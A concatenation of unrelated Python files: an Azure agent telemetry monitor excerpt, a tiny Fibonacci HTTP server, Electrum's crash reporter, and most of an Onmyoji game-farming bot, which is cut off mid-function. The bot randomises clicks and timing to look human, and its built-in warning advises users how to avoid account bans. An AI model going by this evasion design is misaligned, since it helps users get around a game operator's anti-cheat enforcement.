logger.verbose("HostGAPlugin health: {0}", is_healthy)
self.health_service.report_host_plugin_heartbeat(is_healthy)
if not is_healthy:
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HostPluginHeartbeatExtended,
is_success=False,
message='{0} since successful heartbeat'.format(self.host_plugin_errorstate.fail_time),
log_event=False)
except Exception as e:
msg = "Exception sending host plugin heartbeat: {0}".format(ustr(e))
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HostPluginHeartbeat,
is_success=False,
message=msg,
log_event=False)
self.last_host_plugin_heartbeat = datetime.datetime.utcnow()
def send_telemetry_heartbeat(self):
try:
if self.last_telemetry_heartbeat is None:
self.last_telemetry_heartbeat = datetime.datetime.utcnow() - MonitorHandler.TELEMETRY_HEARTBEAT_PERIOD
if datetime.datetime.utcnow() >= (self.last_telemetry_heartbeat + MonitorHandler.TELEMETRY_HEARTBEAT_PERIOD):
io_errors = IOErrorCounter.get_and_reset()
hostplugin_errors = io_errors.get("hostplugin")
protocol_errors = io_errors.get("protocol")
other_errors = io_errors.get("other")
if hostplugin_errors > 0 or protocol_errors > 0 or other_errors > 0:
msg = "hostplugin:{0};protocol:{1};other:{2}".format(hostplugin_errors, protocol_errors,
other_errors)
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HttpErrors,
is_success=True,
message=msg,
log_event=False)
except Exception as e:
logger.warn("Failed to send heartbeat: {0}", ustr(e))
self.last_telemetry_heartbeat = datetime.datetime.utcnow()
def poll_telemetry_metrics(self):
"""
This method polls the tracked cgroups to get data from the cgroups filesystem and send the data directly.
:return: List of Metrics (which would be sent to PerfCounterMetrics directly.
"""
try: # If there is an issue in reporting, it should not take down whole monitor thread.
time_now = datetime.datetime.utcnow()
if not self.last_cgroup_polling_telemetry:
self.last_cgroup_polling_telemetry = time_now
if time_now >= (self.last_cgroup_polling_telemetry +
MonitorHandler.CGROUP_TELEMETRY_POLLING_PERIOD):
metrics = CGroupsTelemetry.poll_all_tracked()
if metrics:
for metric in metrics:
report_metric(metric.category, metric.counter, metric.instance, metric.value)
except Exception as e:
logger.warn("Could not poll all the tracked telemetry due to {0}", ustr(e))
self.last_cgroup_polling_telemetry = datetime.datetime.utcnow()
def send_telemetry_metrics(self):
"""
The send_telemetry_metrics would soon be removed in favor of sending performance metrics directly.
:return:
"""
try: # If there is an issue in reporting, it should not take down whole monitor thread.
time_now = datetime.datetime.utcnow()
if not self.last_cgroup_report_telemetry:
self.last_cgroup_report_telemetry = time_now
if time_now >= (self.last_cgroup_report_telemetry + MonitorHandler.CGROUP_TELEMETRY_REPORTING_PERIOD):
performance_metrics = CGroupsTelemetry.report_all_tracked()
if performance_metrics:
message = generate_extension_metrics_telemetry_dictionary(schema_version=1.0,
performance_metrics=performance_metrics)
add_event(name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.ExtensionMetricsData,
is_success=True,
message=ustr(message),
log_event=False)
except Exception as e:
logger.warn("Could not report all the tracked telemetry due to {0}", ustr(e))
self.last_cgroup_report_telemetry = datetime.datetime.utcnow()
def log_altered_network_configuration(self):
"""
Check various pieces of network configuration and, if altered since the last check, log the new state.
"""
raw_route_list = self.osutil.read_route_table()
digest = hash_strings(raw_route_list)
if digest != self.last_route_table_hash:
self.last_route_table_hash = digest
route_list = self.osutil.get_list_of_routes(raw_route_list)
logger.info("Route table: [{0}]".format(",".join(map(networkutil.RouteEntry.to_json, route_list))))
nic_state = self.osutil.get_nic_state()
if nic_state != self.last_nic_state:
description = "Initial" if self.last_nic_state == {} else "Updated"
logger.info("{0} NIC state: [{1}]".format(description, ", ".join(map(str, nic_state.values()))))
self.last_nic_state = nic_state
|
app.py
|
import os
import signal
import time
import threading
from http.server import (
BaseHTTPRequestHandler,
HTTPServer
)
def fib(n):
a, b = 0, 1
for _ in range(n):
a, b = b, a + b
return a
class MyMsgHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
message = str(fib(int(self.path.split('/')[1])))
except ValueError as ex:
message = "hi,OK"
self.send_response(200)
self.end_headers()
self.wfile.write(message.encode())
return
def do_HEAD(self):
self.send_response(200)
self.end_headers()
return
def log_message(self, format, *args):
print("{0:6f} - {1}".format(time.time(), *args))
return
class MyApp(object):
def __init__(self):
self.httpd = HTTPServer(('0.0.0.0', 5000), MyMsgHandler)
def run(self):
print('starting server at {0:6f}'.format(time.time()))
self.httpd.serve_forever()
def stop(self):
print('stopping server at {0:6f}'.format(time.time()))
threading.Thread(target=self.httpd.shutdown).start()
if __name__ == '__main__':
def graceful_exit_handler(signum, frame):
app.stop()
app = MyApp()
signal.signal(signal.SIGTERM, graceful_exit_handler)
app.run()
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import sys
import queue
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger, get_git_version
class BaseCrashReporter(Logger):
report_server = "https://crashhub.electrum.org"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
USER_COMMENT_PLACEHOLDER = _("Do not enter sensitive/private information here. "
"The report will be visible on the public issue tracker.")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["4943", "e26f"] and ".electrum.org" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data, raise_for_status=True) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = self.__get_traceback_str_to_send()
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": get_git_version() or ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
return args
def __get_traceback_str_to_send(self) -> str:
# make sure that traceback sent to crash reporter contains
# e.__context__ and e.__cause__, i.e. if there was a chain of
# exceptions, we want the full traceback for the whole chain.
return "".join(traceback.format_exception(*self.exc_args))
def _get_traceback_str_to_display(self) -> str:
# overridden in Qt subclass
return self.__get_traceback_str_to_send()
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = self._get_traceback_str_to_display()
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self) -> str:
raise NotImplementedError
class EarlyExceptionsQueue:
"""Helper singleton for explicitly sending exceptions to crash reporter.
Typically the GUIs set up an "exception hook" that catches all otherwise
uncaught exceptions (which unroll the stack of a thread completely).
This class provides methods to report *any* exception, and queueing logic
that delays processing until the exception hook is set up.
"""
_is_exc_hook_ready = False
_exc_queue = queue.Queue()
@classmethod
def set_hook_as_ready(cls):
if cls._is_exc_hook_ready:
return
cls._is_exc_hook_ready = True
while cls._exc_queue.qsize() > 0:
e = cls._exc_queue.get()
cls._send_exception_to_crash_reporter(e)
@classmethod
def send_exception_to_crash_reporter(cls, e: BaseException):
if cls._is_exc_hook_ready:
cls._send_exception_to_crash_reporter(e)
else:
cls._exc_queue.put(e)
@staticmethod
def _send_exception_to_crash_reporter(e: BaseException):
assert EarlyExceptionsQueue._is_exc_hook_ready
sys.excepthook(type(e), e, e.__traceback__)
send_exception_to_crash_reporter = EarlyExceptionsQueue.send_exception_to_crash_reporter
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
|
onmyoji_win.py
|
# -*-coding:utf-8-*-
import time
import datetime
import os
import random
import shelve
import threading
from queue import Queue
import win32api, win32gui, win32con, win32com.client
from ctypes import *
from PIL import ImageGrab, Image as PLI_Image, ImageTk
from tkinter import *
from tkinter import ttk
import tkinter.messagebox as messagebox
from tkinter.scrolledtext import ScrolledText
class GameController:
def __init__(self, hwnd, scaling):
# 获取游戏窗口坐标
self.hwnd = hwnd
self.left, self.top, self.right, self.bottom = win32gui.GetWindowRect(self.hwnd)
self.client_rect = win32gui.GetClientRect(self.hwnd)
self.width = self.client_rect[2]
self.height = self.client_rect[3]
# 获取游戏画面坐标
self.left, self.top = win32gui.ClientToScreen(self.hwnd, (0, 0))
self.right, self.bottom = win32gui.ClientToScreen(self.hwnd, (self.width, self.height))
# 缩放后的游戏窗口坐标
self.ltrb = list(map(lambda x: x * scaling, [self.left, self.top, self.right, self.bottom]))
self.scaling_width = self.width * scaling
self.scaling_height = self.height * scaling
# 挑战按钮坐标
self.chllg_btn = (round(self.left + self.width * 0.695),
round(self.top + self.height * 0.67),
round(self.left + self.width * 0.785),
round(self.top + self.height * 0.73))
# 开始战斗按钮坐标
self.fght_btn = (round(self.left + self.width * 0.75),
round(self.top + self.height * 0.82),
round(self.left + self.width * 0.87),
round(self.top + self.height * 0.88))
# 退出战斗按钮采样坐标
self.exit_btn = (round(self.ltrb[0] + self.scaling_width * 0.014),
round(self.ltrb[1] + self.scaling_height * 0.0245),
round(self.ltrb[0] + self.scaling_width * 0.0415),
round(self.ltrb[1] + self.scaling_height * 0.074))
# 退出战斗按钮hash
self.exit_btn_hash = '1ff83ffc3ffe3ffe007e001f001f019f079e1ffe7fff7ffe1ff8078001800000'
# 结算判定区域采样坐标
self.settle_area = (round(self.ltrb[0] + self.scaling_width * 0.42),
round(self.ltrb[1] + self.scaling_height * 0.82),
round(self.ltrb[0] + self.scaling_width * 0.58),
round(self.ltrb[1] + self.scaling_height * 0.86))
# 结算判定区域hash
self.settle_area_hash = '4f3f672f600fa01fb03ff03ff07df874f171d170c170c970c320c020c000c000'
# 单刷界面判定采样坐标
self.single_intf = (round(self.ltrb[0] + self.scaling_width * 0.45),
round(self.ltrb[1] + self.scaling_height * 0.1),
round(self.ltrb[0] + self.scaling_width * 0.58),
round(self.ltrb[1] + self.scaling_height * 0.18))
self.single_hash = '000000000000000000186e1836387ebc7ebc7eb86ed897fc0000ffffffffffff'
# 组队界面判定采样坐标#
self.form_team_intf = (round(self.ltrb[0] + self.scaling_width * 0.12),
round(self.ltrb[1] + self.scaling_height * 0.8),
round(self.ltrb[0] + self.scaling_width * 0.24),
round(self.ltrb[1] + self.scaling_height * 0.88))
# 组队界面判定hash
self.form_team_hash = '7ffeffffffffffffcd33cd33c823c923cd93c901e577ffffffff7ffe00000000'
# 组队栏位1采样坐标
self.form_team1 = (round(self.ltrb[0] + self.scaling_width * 0.2),
round(self.ltrb[1] + self.scaling_height * 0.4),
round(self.ltrb[0] + self.scaling_width * 0.28),
round(self.ltrb[1] + self.scaling_height * 0.53))
# 组队栏位2采样坐标
self.form_team2 = (round(self.ltrb[0] + self.scaling_width * 0.46),
round(self.ltrb[1] + self.scaling_height * 0.4),
round(self.ltrb[0] + self.scaling_width * 0.54),
round(self.ltrb[1] + self.scaling_height * 0.53))
# 组队栏位3采样坐标
self.form_team3 = (round(self.ltrb[0] + self.scaling_width * 0.76),
round(self.ltrb[1] + self.scaling_height * 0.4),
round(self.ltrb[0] + self.scaling_width * 0.84),
round(self.ltrb[1] + self.scaling_height * 0.53))
# 点击屏幕继续字样采样坐标
self.notice_area = (round(self.ltrb[2] * 0.40),
round(self.ltrb[3] * 0.90),
round(self.ltrb[2] * 0.60),
round(self.ltrb[3] * 0.97))
# 结算点击区域坐标
self.blank_area = (round(self.left + self.width * 0.86),
round(self.top + self.height * 0.23),
round(self.left + self.width * 0.95),
round(self.top + self.height * 0.7))
# 组队栏位为空时hash
self.form_team_blank_hash = 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
# 悬赏界面采样坐标
self.offer_intf = (round(self.ltrb[0] + self.scaling_width * 0.4),
round(self.ltrb[1] + self.scaling_height * 0.2),
round(self.ltrb[0] + self.scaling_width * 0.6),
round(self.ltrb[1] + self.scaling_height * 0.28))
# 悬赏界面hash
self.offer_hash = 'ffffffffffff3fff35fde004200020000004040420100064247037f7ffffffff'
# 悬赏接受按钮坐标
self.accept = (round(self.left + self.width * 0.66),
round(self.top + self.height * 0.6))
# 悬赏拒绝按钮坐标
self.denied = (round(self.left + self.width * 0.66),
round(self.top + self.height * 0.74))
# 状态初始化
self._running = 1
@staticmethod
def click_left_cur(counts=1):
for o in range(counts):
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP | win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
time.sleep(0.1)
time.sleep(0.1*random.random())
@staticmethod
def click_right_cur():
win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTUP | win32con.MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0)
@staticmethod
def move_curpos(x, y):
time.sleep(0.5*random.random())
windll.user32.SetCursorPos(x, y)
time.sleep(0.5*random.random())
@staticmethod
def get_curpos():
return win32gui.GetCursorPos()
@staticmethod
def get_hash(img):
img = img.resize((16, 16), PLI_Image.ANTIALIAS).convert('L')
avg = sum(list(img.getdata())) / 256 # 计算像素平均值
s = ''.join(map(lambda x: '0' if x < avg else '1', img.getdata())) # 每个像素进行比对,大于avg为1,反之为0
return ''.join(map(lambda j: '%x' % int(s[j:j + 4], 2), range(0, 256, 4)))
@staticmethod
def hamming(hash1, hash2, n=20):
result = False
assert len(hash1) == len(hash2)
# print(sum(ch1 != ch2 for ch1, ch2 in zip(hash1, hash2)))
if sum(ch1 != ch2 for ch1, ch2 in zip(hash1, hash2)) <= n:
result = True
return result
def form_team_phase(self, mode, fight_num, queue):
if mode == '单刷':
# 移动到挑战按钮并点击 每次移动在按钮范围内加入随机坐标位移
xrandom = int(random.uniform(0, self.chllg_btn[2] - self.chllg_btn[0]))
yrandom = int(random.uniform(0, self.chllg_btn[3] - self.chllg_btn[1]))
self.move_curpos(self.chllg_btn[0] + xrandom, self.chllg_btn[1] + yrandom)
time.sleep(0.5)
self.click_left_cur()
return
elif mode == '司机':
# 检测是否进入组队界面
while True:
if not queue.empty():
self._running = queue.get()
if self._running == 1:
catch_img = ImageGrab.grab(self.form_team_intf)
if self.hamming(self.get_hash(catch_img), self.form_team_hash, 30):
break
time.sleep(0.5)
time.sleep(0.3*random.random())
elif self._running == 0:
return
# 检测队伍人数,符合预期再点开始战斗
while True:
if not queue.empty():
self._running = queue.get()
if self._running == 1:
num = 0
for i in [self.form_team1, self.form_team2, self.form_team3]:
catch_img = ImageGrab.grab(i)
# self.get_hash(catch_img)
if not self.hamming(self.get_hash(catch_img), self.form_team_blank_hash, 10):
num = num + 1
if num == fight_num:
break
time.sleep(0.5)
time.sleep(0.3*random.random())
elif self._running == 0:
return
# 移动到开始战斗按钮并点击 每次移动在按钮范围内加入随机坐标位移
xrandom = int(random.uniform(0, self.fght_btn[2] - self.fght_btn[0]))
yrandom = int(random.uniform(0, self.fght_btn[3] - self.fght_btn[1]))
self.move_curpos(self.fght_btn[0] + xrandom, self.fght_btn[1] + yrandom)
time.sleep(0.5)
time.sleep(0.3*random.random())
self.click_left_cur()
elif mode == '乘客':
return
def wait_fight_finish_phase(self, clear_time, queue):
t = 0
while t < clear_time:
if not queue.empty():
self._running = queue.get()
if self._running == 1:
time.sleep(1)
t = t + 1
# print(t)
elif self._running == 0:
break
while True:
if not queue.empty():
self._running = queue.get()
if self._running == 1:
catch_img = ImageGrab.grab(self.exit_btn)
# catch_img.save('fight.jpg', 'jpeg')
# 当退出战斗按钮消失时,视为战斗结束
if self.hamming(self.get_hash(catch_img), self.exit_btn_hash, 30):
pass
else:
break
elif self._running == 0:
return
time.sleep(0.5)
def settle_phase(self, queue):
for xx in range(0, 10):
if not queue.empty():
self._running = queue.get()
if self._running == 1:
# 当镜头旋转结束,出现结算达摩,则视为进入结算界面
catch_img = ImageGrab.grab(self.settle_area)
# catch_img.save('%s.jpg' % xx, 'jpeg')
if self.hamming(self.get_hash(catch_img), self.settle_area_hash, 20):
break
else:
# 在右侧边缘范围内随机移动鼠标位置,并随机点击1-3次
xrandom = int(random.uniform(0, self.blank_area[2] - self.blank_area[0]))
yrandom = int(random.uniform(0, self.blank_area[3] - self.blank_area[1]))
self.move_curpos(self.blank_area[0] + xrandom, self.blank_area[1] + yrandom)
self.click_left_cur(int(random.uniform(2, 4)))
elif self._running == 0:
break
time.sleep(0.5)
for xx in range(0, 10):
if not queue.empty():
self._running = queue.get()
if self._running == 1:
catch_img = ImageGrab.grab(self.settle_area)
# 当结算达摩消失时,视为结算结束
if not self.hamming(self.get_hash(catch_img), self.settle_area_hash, 20):
break
else:
# 在右侧边缘范围内随机移动鼠标位置,并随机点击1-3次,直到结算结束
xrandom = int(random.uniform(0, self.blank_area[2] - self.blank_area[0]))
yrandom = int(random.uniform(0, self.blank_area[3] - self.blank_area[1]))
self.move_curpos(self.blank_area[0] + xrandom, self.blank_area[1] + yrandom)
time.sleep(random.random())
self.click_left_cur(int(random.uniform(2, 4)))
elif self._running == 0:
break
time.sleep(0.5)
time.sleep(0.3*random.random())
def check_offer(self, offer_mode, queue):
while True:
if not queue.empty():
self._running = queue.get()
if self._running == 1:
catch_img = ImageGrab.grab(self.offer_intf)
if self.hamming(self.get_hash(catch_img), self.offer_hash, 30):
if offer_mode == "接受":
self.move_curpos(self.accept[0], self.accept[1])
elif offer_mode == "拒绝":
self.move_curpos(self.denied[0], self.denied[1])
self.click_left_cur()
time.sleep(1.3)
elif self._running == 0:
return
class Application(Frame):
def __init__(self, master=None):
self.warning = '【封号防止】\n' + \
'请尽量在自己的日常刷魂时间使用\n' + \
'请不要长时间连续使用,任何使你看起来明显违背人类正常作息规律的行为,很容易会被鬼使黑盯上\n' + \
'当你离开了常在城市,请不要使用,这会被认为是找了代练\n' + \
'点到为止,贪婪是万恶之源\n'
self.label = r'阴阳师-网易游戏'
self.hwnd = None
self.shell = None
if not self.info_get():
self.scaling = 1
self.clear_time = 35
self.fight = None
self.timing_value = None
# 控件初始化
Frame.__init__(self, master)
self.pack()
self.frame1 = Frame(self)
self.frame1.pack()
self.frame2 = Frame(self)
self.frame2.pack()
self.label_scaling = Label(self.frame1)
self.var_scaling = StringVar(self.frame1)
self.entry_scaling = Entry(self.frame1)
self.button_scaling_explain = Button(self.frame1)
self.label_mode = Label(self.frame1)
self.var_mode = StringVar(self.frame1)
self.listbox_mode = ttk.Combobox(self.frame1)
self.button_mode_explain = Button(self.frame1)
self.label_member = Label(self.frame1)
self.var_member = IntVar()
self.radio1 = Radiobutton(self.frame1)
self.radio2 = Radiobutton(self.frame1)
self.label_clear_time = Label(self.frame1)
self.var_clear_time = StringVar(self.frame1)
self.entry_clear_time = Entry(self.frame1)
self.button_clear_time_explain = Button(self.frame1)
self.label_offer = Label(self.frame1)
self.var_offer_mode = StringVar(self.frame1)
self.listbox_offer_mode = ttk.Combobox(self.frame1)
self.label_timing_mode = Label(self.frame1)
self.var_timing_mode = StringVar(self.frame1)
self.listbox_timing_mode = ttk.Combobox(self.frame1)
self.var_timing_value = StringVar(self.frame1)
self.entry_timing_value = Entry(self.frame1)
self.entry_test = Entry(self.frame1)
self.test_btn = Button(self.frame1)
self.start_ctn = Button(self.frame2)
self.stop_ctn = Button(self.frame2)
self.info_box = ScrolledText(self.frame2)
self.queue = Queue(maxsize=1)
self._running = 1
self.create_main()
@staticmethod
def check_hwnd(label):
# 获取游戏窗口句柄
hwnd = win32gui.FindWindow(None, label)
if hwnd:
return hwnd
else:
print('游戏没有运行')
return False
@staticmethod
def init_window_place(root, x, y):
screenwidth = root.winfo_screenwidth()
screenheight = root.winfo_screenheight()
root.resizable(False, False)
root.update_idletasks()
root.deiconify()
width = root.winfo_width()
height = root.winfo_height()
size = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / x, (screenheight - height) / y)
root.geometry(size)
def jump_window(self):
# 跳转到游戏窗口
win32gui.SetForegroundWindow(self.hwnd)
win32gui.PostMessage(self.hwnd, win32con.WM_SYSCOMMAND, win32con.SC_RESTORE, 0)
def get_scaling(self):
var = self.entry_scaling.get()
try:
var = float(var)
except ValueError:
messagebox.showinfo(title='提示', message='缩放倍率只能为数字')
return False
if var > 2:
messagebox.showinfo(title='提示', message='缩放倍率过高')
return False
return var
def get_clear_time(self):
var = self.var_clear_time.get()
try:
var = float(var)
except ValueError:
messagebox.showinfo(title='提示', message='平均通关时间只能为数字')
return False
if var <= 5:
messagebox.showinfo(title='提示', message='平均通关时间不能小于5')
return False
return var
def get_timimg(self):
if self.listbox_timing_mode.get() == '无':
return True
var = self.var_timing_value.get()
try:
var = float(var)
except ValueError:
messagebox.showinfo(title='提示', message='预定结束只能填入数字')
return False
if var < 1:
messagebox.showinfo(title='提示', message='数字过小,无法执行')
return False
return var
@staticmethod
def time_format(second):
try:
second = int(second)
except ValueError:
return second
if second > 60:
m, s = divmod(second, 60)
h, m = divmod(m, 60)
return ':'.join((str(h).zfill(2), str(m).zfill(2), str(s).zfill(2)))
else:
return second
def info_get(self):
try:
with shelve.open('mysetting.db') as data:
setting_data = data['setting']
self.scaling = setting_data['scaling']
self.clear_time = setting_data['clear_time']
except KeyError:
return False
return True
def info_save(self):
with shelve.open('mysetting.db') as data:
setting_data = dict()
setting_data['scaling'] = self.var_scaling.get()
setting_data['clear_time'] = self.var_clear_time.get()
data['setting'] = setting_data
def turn_radio_on(self, *args):
type(args)
var = self.listbox_mode.get()
if var == '司机':
self.radio1.configure(state='active')
self.radio2.configure(state='active')
else:
self.radio1.configure(state='disabled')
self.radio2.configure(state='disabled')
def turn_entry_on(self, *args):
type(args)
var = self.listbox_timing_mode.get()
if var == '定时[分钟]' or var == '场数':
self.entry_timing_value.configure(state='normal')
else:
self.entry_timing_value.configure(state='disabled')
def fight_start(self):
self.scaling = self.get_scaling()
if not self.scaling:
return False
self.clear_time = self.get_clear_time()
if not self.clear_time:
return False
self.timing_value = self.get_timimg()
if not self.timing_value:
return False
self.info_save()
# 获取游戏窗口句柄
self.hwnd = self.check_hwnd(self.label)
if not self.hwnd:
messagebox.showinfo(title='提示', message='游戏没有运行')
return False
self.shell = win32com.client.Dispatch("WScript.Shell")
# self.shell.SendKeys('%')
self.jump_window()
time.sleep(0.5)
self.fight = GameController(self.hwnd, self.scaling)
thread1 = threading.Thread(target=self.fight_thread, name='fight_thread')
thread2 = threading.Thread(target=self.offer_thread, name='offer_thread')
# 将线程状态、队列内容置为1
self._running = 1
if self.queue.empty():
self.queue.put(1)
else:
self.queue.get()
self.queue.put(1)
self.start_ctn.configure(state='disabled')
self.stop_ctn.configure(state='active')
thread1.start()
thread2.start()
def fight_thread(self):
self.jump_window()
if not self.queue.empty():
self.queue.get()
self.info_box.mark_set('insert', END)
self.info_box.insert('insert', str(self.warning) + '\n', 'RED')
self.info_box.tag_config('RED', foreground='red')
var = '[%s]挂机开始' % datetime.datetime.now().strftime("%H:%M:%S")
self.info_box.mark_set('insert', END)
self.info_box.insert('insert', str(var) + '\n')
self.info_box.see(END)
rounds = 0
total_time = 0
beginning_timg = time.clock()
while True:
if self._running == 1:
fight_start_time = time.clock()
self.fight.form_team_phase(self.listbox_mode.get(), self.var_member.get(), self.queue)
self.fight.wait_fight_finish_phase(self.clear_time, self.queue)
self.jump_window()
self.fight.settle_phase(self.queue)
if self._running == 1:
fight_end_time = time.clock()
fight_time = fight_end_time - fight_start_time
# time.sleep(0.5)
rounds = rounds + 1
total_time = total_time + fight_time
elapsed_time = fight_end_time - beginning_timg
var = '第 %s 场 耗时:%s 共计:%s' % \
(rounds, self.time_format(fight_time), self.time_format(elapsed_time))
self.info_box.mark_set('insert', END)
self.info_box.insert('insert', str(var) + '\n')
self.info_box.see(END)
# 检查是否到达预定结束场数或时间
if (self.listbox_timing_mode.get() == '场数' and rounds >= self.timing_value) or \
(self.listbox_timing_mode.get() == '定时[分钟]' and elapsed_time / 60 >= self.timing_value):
win32gui.PostMessage(self.hwnd, win32con.WM_CLOSE, 0, 0)
self.fight_stop()
var = '已到达预定目标,游戏窗口已关闭。下线15分钟后buff自动关闭'
self.info_box.mark_set('insert', END)
self.info_box.insert('insert', str(var) + '\n')
self.info_box.see(END)
time.sleep(random.uniform(1, 2))
elif self._running == 0:
return
def fight_stop(self):
# 将线程状态、队列内容置为0
self._running = 0
self.queue.put(0)
self.start_ctn.configure(state='active')
self.stop_ctn.configure(state='disabled')
var = '[%s]挂机结束。记得关御魂buff' % datetime.datetime.now().strftime("%H:%M:%S")
self.info_box.mark_set('insert', END)
self.info_box.insert('insert', str(var) + '\n')
self.info_box.see(END)
def offer_thread(self):
while True:
if self._running == 1:
self.fight.check_offer(self.listbox_offer_mode.get(), self.queue)
elif self._running == 0:
return
@staticmethod
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
return os.path.join(base_path, relative_path)
def what_is_scaling_window(self):
what_is_scaling = Toplevel(self)
what_is_scaling.title('缩放倍率 - 不能自动获取,技术就是这么菜,不服憋着_(:3」∠)_')
frame1 = Frame(what_is_scaling)
frame1.pack()
frame2 = Frame(what_is_scaling)
frame2.pack()
title = Label(frame1)
title['text'] = '\n【 缩放倍率 】'
title.pack()
desc1 = Message(frame1)
desc1['width'] = 600
desc1['text'] = '\n缩放倍率是指Windows系统在不改变分辨率的情况下,将窗口和图标放大以达到更加舒适的显示效果的功能\n' + \
'\n在某些分辨率下,Windows会自动设置一个超过100%的倍率。请确定自己系统当前的缩放倍率设置,并填入缩放倍率一栏中\n' + \
'\n不正确的缩放倍率设置,会导致坐标计算不准\n' + \
'\n若设置的缩放倍率是100%,则填入1,若是125%,则填1.25,依次类推\n'
desc1.pack()
label_win10 = Label(frame2)
label_win10['text'] = 'Windows 10'
label_win10.grid(row=0, column=0)
label_win7 = Label(frame2)
label_win7['text'] = 'Windows 7'
label_win7.grid(row=0, column=1)
ipath = self.resource_path('image/win10.png')
load = PLI_Image.open(ipath)
load = load.resize(tuple(map(lambda x: int(x * 0.5), load.size)))
render = ImageTk.PhotoImage(load)
img_win10 = Label(frame2, image=render)
img_win10.image = render
img_win10.grid(row=1, column=0)
ipath = self.resource_path('image/win7.png')
load = PLI_Image.open(ipath)
load = load.resize(tuple(map(lambda x: int(x * 0.5), load.size)))
render = ImageTk.PhotoImage(load)
img_win7 = Label(frame2, image=render)
img_win7.image = render
img_win7.grid(row=1, column=1)
self.init_window_place(what_is_scaling, 1.3, 3)
def when_click_start_window(self):
when_click_start = Toplevel(self)
when_click_start.title('模式说明')
var = self.listbox_mode.get()
if var == '单刷':
title = Label(when_click_start)
title['text'] = '\n【 单刷模式 】'
title.pack()
desc = Message(when_click_start)
desc['text'] = '\n请把游戏调整至如图所示界面,再点START\n'
desc['width'] = 300
desc.pack()
ipath = self.resource_path('image/single.png')
load = PLI_Image.open(ipath)
load = load.resize(tuple(map(lambda x: int(x * 0.7), load.size)))
render = ImageTk.PhotoImage(load)
img = Label(when_click_start, image=render)
img.image = render
img.pack()
elif var == '乘客':
title = Label(when_click_start)
title['text'] = '\n【 乘客模式 】'
title.pack()
desc = Message(when_click_start)
desc['text'] = '\n建议接受了司机的默认邀请,再点START\n' + \
'因为我不会在战斗里帮你点开始...不服憋着\n_(:3」∠)_\n'
desc['width'] = 300
desc.pack()
ipath = self.resource_path('image/passenger_accept.png')
load = PLI_Image.open(ipath)
load = load.resize(tuple(map(lambda x: int(x * 0.7), load.size)))
render = ImageTk.PhotoImage(load)
